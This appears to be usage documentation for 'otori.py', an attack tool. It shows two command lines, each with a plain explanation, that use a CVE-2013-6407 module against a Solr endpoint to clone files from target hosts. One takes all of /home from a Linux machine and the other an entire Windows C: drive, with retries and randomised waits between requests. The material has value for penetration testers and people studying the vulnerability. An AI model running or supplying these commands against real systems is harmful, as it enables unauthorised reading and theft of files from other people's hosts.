Example 1:

python ./otori.py --clone --module "CVE-2013-6407-DARH" --rooturi "file:///home" --module-options "http://192.168.23.87:8983/solr/analysis/document" --outputbase "./output" --overwrite --maxdepth 10 --uriblacklist "./data/uri_blacklist-linux-basic.txt" --noemptyfiles --nowhitespacefiles --noemptydirs --console-verbosity info --log test-2014-03-02-03.txt --log-verbosity debug --retries 3 --request-waittime 1000 --request-waittime-window 1000

Clone all possible content from /home and its subdirectories (on the target system - 192.168.23.87) into a directory structure starting in the subdirectory "output" within the current directory.

If any local files exist that match the paths of downloaded files, overwrite them.

Do not step down more than 10 subdirectories deep.

Do not process paths contained in the data/uri_blacklist-linux-basic.txt file.

Do not retain files which are empty or contain only whitespace, and delete any local copies of directories which are empty.

Display information-level (and higher) messages in the console.

Log debug-level (and higher) messages to the file test-2014-03-02-03.txt.

Retry failed attempts up to 3 times, as long as they are of types which are likely to succeed if retried.

Wait a random period of time between 0 and 2000 milliseconds between requests.



Example 2:

python ./otori.py --clone --module "CVE-2013-6407-DARH" --rooturi "file://\\c:\\" --module-options "http://192.168.23.88:8983/solr/analysis/document" --outputbase "./output/win2003" --console-verbosity debug

Clone all possible content from the C: drive of the target Windows host (192.168.23.88) into a directory structure starting in the subdirectory "output/win2003" within the current directory.

Display debug-level (and higher) messages in the console.